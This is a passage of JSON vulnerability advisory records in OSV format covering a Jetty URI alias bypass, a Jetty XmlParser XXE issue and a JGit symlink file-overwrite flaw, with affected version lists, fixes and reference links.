remove relative segments that were encoded or parameterized and made the resulting URI paths safe from any repeated normalization (often done by URI manipulation and file system mapping).\n + The `FileResource` class treated any difference between absolute path and canonical path of a resource as an alias, and thus the resource would not be served by default.\n\nPrior to 9.4.37, the `FileResource` class was replaced by the `PathResource` class that did not treat normalization differences as aliases. Then release 9.4.37 updated the URI parsing to be compliant with the RFC, in that normalization is done before decoding.
This allowed various encodings or adornments to relative path segments that would not be normalized by the pure RFC URI normalization, but were normalized by the file system, thus allowing protected resources to be accessed via an alias. Specifically by decoding URIs after normalization, it left them vulnerable to any subsequent normalization (potentially after checking security constraints) changing the URI significantly. Such extra normalization is often done by URI manipulation code and file systems.\n\nWith Jetty releases 9.4.43, 10.0.6, 11.0.6, we have restored several lines of defense:\n + URIs are first decoded and then normalized which is not strictly according to the current RFC. Since the normalization is done after decoding, the URI paths produced are safe from further normalisation and the referenced resource cannot easily be so changed after passing security constraints.\n + During URI parsing checks are made for some specific segments/characters that are possible to be seen ambiguously by an application (e.g. encoded dot segments, encoded separators, empty segments, parameterized dot segments and/or null characters). So even though Jetty code handles these URIs correctly, there is a risk that an application may not do so, thus such requests are rejected with a 400 Bad Request unless a specific compliance mode is set.\n + Once decoded and normalized by initial URI processing, Jetty will not decode or normalize a received URI again within its own resource handling. This avoids the possibility of double decode attacks.\n + The `ContextHandler.getResource(String path)` method always checks that the passed path is normalized, only accepting a non normal path if approved by an AliasChecker. This is the method that is directly used by Jetty resource serving.\n + The API methods like `ServletContext.getResource(String path)` will normalize the path prior to calling `ContextHandler.getResource(String path)`.
This allows applications to use non normal paths.\n + The `PathResource` class now considers any difference in normal/canonical name between a request resource name and the found resource name to be an alias, which will only be served if approved by an explicit `AliasChecker`\n\nIn summary, the defense is a front line of detection of specific known URI alias attacks, with the last line defense of not allowing any aliasing of resources.\n\nMany thanks to @cangqingzhe from @CloverSecLabs for reporting this issue. ", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.37" }, { "fixed": "9.4.43" } ] } ], "versions": [ "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/07/GHSA-vjv5-gp2w-65vm/GHSA-vjv5-gp2w-65vm.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.1" }, { "fixed": "10.0.6" } ] } ], "versions": [ "10.0.1", "10.0.2", "10.0.3", "10.0.4", "10.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/07/GHSA-vjv5-gp2w-65vm/GHSA-vjv5-gp2w-65vm.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.1" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/07/GHSA-vjv5-gp2w-65vm/GHSA-vjv5-gp2w-65vm.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34429" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r833a4c8bdbbfeb8a2cd38238e7b59f83edd5c1a0e508b587fc551a46@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d245c6c884bbc804a472116d730c1a01676bf24f93206a34923fc64@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e6158d72ef25077c2dc59fbddade2eacf7d259a2556c97a989f2fe8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb33d65c3e5686f2e3b9bb8a032a44163b2f2ad9d31a8727338f213c1@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc26807be68748b3347decdcd03ae183622244b0b4cb09223d4b7e500@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb157f55b9ae41b3076801de927c6fca1669c6d8eaf11a9df5dbeb46@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re01890eef49d4201018f2c97e26536e3e75f441ecdbcf91986c3bc17@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3de01414ccf682fe0951205f806dd8e94440798fd64c55a4941de3e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re5e9bb535db779506013ef8799dc2a299e77cdad6668aa94c456dba6@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re850203ef8700cb826534dd4a1cb9f5b07bb8f6f973b39ff7838d3ba@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210819-0006" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.43.v20210629" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r029c0c6833c8bb6acb094733fd7b75029d633f47a92f1c9d14391fc0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02f940c27e997a277ff14e79e84551382e1081e8978b417e0c2b0857@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0626f279ebf65506110a897e3a57ccd4072803ee5434b2503e070398@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r2e32390cb7aedb39069e5b18aa130ca53e766258518faee63c31d3ea@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3aefe613abce594c71ace50088d2529bbde65d08b8e7ff2c2723aaa1@%3Cdev.santuario.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r44ea39ca8110de7353bfec88f58aa3aa58a42bb324b8772512ee190c@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46900f74dbb7d168aeac43bf0e7f64825376bb7eb74d31a5b33344ce@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46f748c1dc9cf9b6c1c18f6b5bfc3a869907f68f72e17666f2f30f24@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4727d282b5c2d951057845a46065d59f6e33132edc0a14f41c26b01e@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48a93f2bc025acd7c7e341ed3864bfdeb75f0c768d41bc247e1a1f63@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5678d994d4dd8e7c838eed3bbc1a83a7f6bc62724b0cce67e8892a45@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r679d96f981d4c92724090ed2d5e8565a1d655a72bb315550489f052e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e6f50c1ce1fb592cb43e913f5be23df104d50751465f8f1952ace0c@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r721ab6a5fa8d45bec76714b674f5d4caed2ebfeca69ad1d6d4caae6c@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r74fdc446df551fe89a0a16957a1bfdaad19380e0c1afd30625685a9c@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r756443e9d50af7e8c3df82e2c45105f452c8e8195ddbc0c00f58d5fe@%3Ccommits.kafka.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-551", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2021-07-15T21:33:21Z", "nvd_published_at": "2021-07-15T17:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-58qw-p7qm-5rvh", "published": "2023-07-10T21:52:39Z", "modified": "2024-12-02T05:55:39.987028Z", "related": [ "CGA-36vh-w34f-wv6m", "CGA-cvc4-35r3-qcp6" ], "summary": "Eclipse Jetty XmlParser allows arbitrary DOCTYPE declarations", "details": "### From the reporter\n\n\u003e `XmlParser` is vulnerable to XML external entity (XXE) vulnerability.\n\u003e XmlParser is being used when parsing Jetty’s xml configuration files. An attacker might exploit\n\u003e this vulnerability in order to achieve SSRF or cause a denial of service.\n\u003e One possible scenario is importing a (remote) malicious WAR into a Jetty’s server, while the\n\u003e WAR includes a malicious web.xml.\n\n### Impact\nThere are no circumstances in a normally deployed Jetty server where potentially hostile XML is given to the XmlParser class without the attacker already having arbitrary access to the server. I.e. in order to exploit `XmlParser` the attacker would already have the ability to deploy and execute hostile code. Specifically, Jetty has no protection against malicious web applications, and potentially hostile web applications should only be run in an isolated virtualised environment. \n\nThus this is not considered a vulnerability of the Jetty server itself, as any such usage of the jetty XmlParser is equally vulnerable as a direct usage of the JVM supplied SAX parser. 
No CVE will be allocated to this advisory.\n\nHowever, any direct usage of the `XmlParser` class by an application may be vulnerable. The impact would greatly depend on how the application uses `XmlParser`, but it could be a denial of service due to large entity expansion, or possibly the disclosure of local files if the XML results are accessible remotely.\n\n### Patches\nThe ability to configure the SAXParserFactory to fit the needs of your particular XML parser implementation has been merged as part of PR #10067.\n\n### Workarounds\nDon't use `XmlParser` to parse data from users.\n\n\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-xml", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-xml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-alpha0" }, { "fixed": "10.0.16" } ] } ], "versions": [ "10.0.0", "10.0.0-alpha0", "10.0.0.alpha1", "10.0.0.alpha2", "10.0.0.beta0", "10.0.0.beta1", "10.0.0.beta2", "10.0.0.beta3", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.15", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-58qw-p7qm-5rvh/GHSA-58qw-p7qm-5rvh.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-xml", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-xml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-alpha0" }, { "fixed": "11.0.16" } ] } ], "versions": [ "11.0.0", "11.0.0-alpha0", "11.0.0.beta1", "11.0.0.beta2", "11.0.0.beta3", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.15", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-58qw-p7qm-5rvh/GHSA-58qw-p7qm-5rvh.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-xml", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-xml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0.alpha0" }, { "fixed": "12.0.0" } ] } ], "versions": [ "12.0.0.alpha0", "12.0.0.alpha1", "12.0.0.alpha2", "12.0.0.alpha3", "12.0.0.beta0", "12.0.0.beta1", "12.0.0.beta2", "12.0.0.beta3", "12.0.0.beta4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 12.0.0.beta4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-58qw-p7qm-5rvh/GHSA-58qw-p7qm-5rvh.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-xml", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-xml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.52.v20230823" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", 
"7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", 
"9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", 
"9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.51", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-58qw-p7qm-5rvh/GHSA-58qw-p7qm-5rvh.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/10067" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2023-07-10T21:52:39Z", "nvd_published_at": null, "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3p86-9955-h393", "published": "2023-09-18T15:30:18Z", "modified": "2024-04-11T19:46:07.697031Z", "aliases": [ "CVE-2023-4759" ], "related": [ "CGA-f3hc-jjwc-wwjp" ], "summary": "Arbitrary File Overwrite in Eclipse JGit ", "details": "Arbitrary File Overwrite in Eclipse JGit \u003c= 6.6.0\n\nIn Eclipse JGit, all versions \u003c= 6.6.0.202305301015-r, a symbolic link present in a specially crafted git repository can be used to write a file to locations 
outside the working tree when this repository is cloned with JGit to a case-insensitive filesystem, or when a checkout from a clone of such a repository is performed on a case-insensitive filesystem.\n\nThis can happen on checkout (DirCacheCheckout), merge (ResolveMerger via its WorkingTreeUpdater), pull (PullCommand using merge), and when applying a patch (PatchApplier). This can be exploited for remote code execution (RCE), for instance if the file written outside the working tree is a git filter that gets executed on a subsequent git command.\n\nThe issue occurs only on case-insensitive filesystems, like the default filesystems on Windows and macOS. The user performing the clone or checkout must have the rights to create symbolic links for the problem to occur, and symbolic links must be enabled in the git configuration.\n\nSetting git configuration option core.symlinks = false before checking out avoids the problem.\n\nThe issue was fixed in Eclipse JGit version 6.6.1.202309021850-r and 6.7.0.202309050840-r, available via Maven Central https://repo1.maven.org/maven2/org/eclipse/jgit/  and repo.eclipse.org https://repo.eclipse.org/content/repositories/jgit-releases/ . 
A backport is available in 5.13.3 starting from 5.13.3.202401111512-r.\n\nThe JGit maintainers would like to thank RyotaK for finding and reporting this issue.\n\n\n\n", "affected": [ { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0.202111291000-r" }, { "fixed": "6.6.1.202309021850-r" } ] } ], "versions": [ "6.0.0.202111291000-r", "6.1.0.202203080745-r", "6.2.0.202206071550-r", "6.3.0.202209071007-r", "6.4.0.202211300538-r", "6.5.0.202303070854-r", "6.6.0.202305301015-r" ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.6.0.202305301015-r", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-3p86-9955-h393/GHSA-3p86-9955-h393.json" } }, { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "5.13.3.202401111512-r" } ] } ], "versions": [ "1.2.0.201112221803-r", "1.3.0.201202151440-r", "2.0.0.201206130900-r", "2.1.0.201209190230-r", "2.2.0.201212191850-r", "2.3.1.201302201838-r", "3.0.0.201306101825-r", "3.1.0.201310021548-r", "3.2.0.201312181205-r", "3.3.0.201403021825-r", "3.3.1.201403241930-r", "3.3.2.201404171909-r", "3.4.0.201405051725-m7", "3.4.0.201405211411-rc1", "3.4.0.201405281120-rc2", "3.4.0.201406041058-rc3", "3.4.0.201406110918-r", "3.4.1.201406201815-r", "3.4.2.201412180340-r", "3.5.0.201409071800-rc1", "3.5.0.201409260305-r", "3.5.1.201410131835-r", "3.5.2.201411120430-r", "3.5.3.201412180710-r", "3.6.0.201411121045-m1", "3.6.0.201412230720-r", "3.6.1.201501031845-r", "3.6.2.201501210735-r", "3.7.0.201502260915-r", "3.7.1.201504261725-r", "4.0.0.201505050340-m2", "4.0.0.201505260635-rc2", "4.0.0.201506020755-rc3", "4.0.0.201506090130-r", 
"4.0.1.201506240215-r", "4.0.2.201509141540-r", "4.0.3.201509231615-r", "4.1.0.201509280440-r", "4.1.1.201511131810-r", "4.1.2.201602141800-r", "4.10.0.201712302008-r", "4.11.0.201803080745-r", "4.11.1.201807311124-r", "4.11.2.201809100523-r", "4.11.3.201809181037-r", "4.11.4.201810060650-r", "4.11.5.201810191925-r", "4.11.6.201812241910-r", "4.11.7.201903122105-r", "4.11.8.201904181247-r", "4.11.9.201909030838-r", "4.2.0.201601211800-r", "4.3.0.201604071810-r", "4.3.1.201605051710-r", "4.4.0.201605250940-rc1", "4.4.0.201606070830-r", "4.4.1.201607150455-r", "4.5.0.201609210915-r", "4.5.1.201703201650-r", "4.5.2.201704071617-r", "4.5.3.201708160445-r", "4.5.4.201711221230-r", "4.5.5.201812240535-r", "4.5.6.201903121547-r", "4.5.7.201904151645-r", "4.6.0.201612231935-r", "4.6.1.201703071140-r", "4.7.0.201704051617-r", "4.7.1.201706071930-r", "4.7.2.201807261330-r", "4.7.3.201809090215-r", "4.7.4.201809180905-r", "4.7.5.201810051826-r", "4.7.6.201810191618-r", "4.7.7.201812240805-r", "4.7.8.201903121755-r", "4.7.9.201904161809-r", "4.8.0.201705170830-rc1", "4.8.0.201706111038-r", "4.9.0.201710071750-r", "4.9.1.201712030800-r", "4.9.10.201904181027-r", "4.9.2.201712150930-r", "4.9.3.201807311005-r", "4.9.4.201809090327-r", "4.9.5.201809180939-r", "4.9.6.201810051924-r", "4.9.7.201810191756-r", "4.9.8.201812241815-r", "4.9.9.201903122025-r", "5.0.0.201805151920-m7", "5.0.0.201805221745-rc1", "5.0.0.201805301535-rc2", "5.0.0.201806131550-r", "5.0.1.201806211838-r", "5.0.2.201807311906-r", "5.0.3.201809091024-r", "5.1.0.201809111528-r", "5.1.1.201809181055-r", "5.1.10.201908230655-r", "5.1.11.201909031202-r", "5.1.12.201910011832-r", "5.1.13.202002110435-r", "5.1.14.202011251942-r", "5.1.15.202012011955-r", "5.1.16.202106041830-r", "5.1.2.201810061102-r", "5.1.3.201810200350-r", "5.1.5.201812261915-r", "5.1.6.201903130242-r", "5.1.7.201904200442-r", "5.1.8.201906050907-r", "5.1.9.201908210455-r", "5.10.0.202012080955-r", "5.11.0.202103091610-r", "5.11.1.202105131744-r", 
"5.12.0.202106070339-r", "5.13.0.202109080827-r", "5.13.1.202206130422-r", "5.13.2.202306221912-r", "5.2.0.201812061821-r", "5.2.1.201812262042-r", "5.2.2.201904231744-r", "5.3.0.201903130848-r", "5.3.1.201904271842-r", "5.3.2.201906051522-r", "5.3.4.201908231101-r", "5.3.5.201909031855-r", "5.3.6.201910020505-r", "5.3.7.202002110540-r", "5.3.8.202011260953-r", "5.3.9.202012012026-r", "5.4.0.201906121030-r", "5.4.2.201908231537-r", "5.4.3.201909031940-r", "5.5.0.201909110433-r", "5.5.1.201910021850-r", "5.6.0.201912101111-r", "5.6.1.202002131546-r", "5.7.0.202003090808-r", "5.7.0.202003110725-r", "5.8.0.202006091008-r", "5.8.1.202007141445-r", "5.9.0.202009080501-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-3p86-9955-h393/GHSA-3p86-9955-h393.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4759" }, { "type": 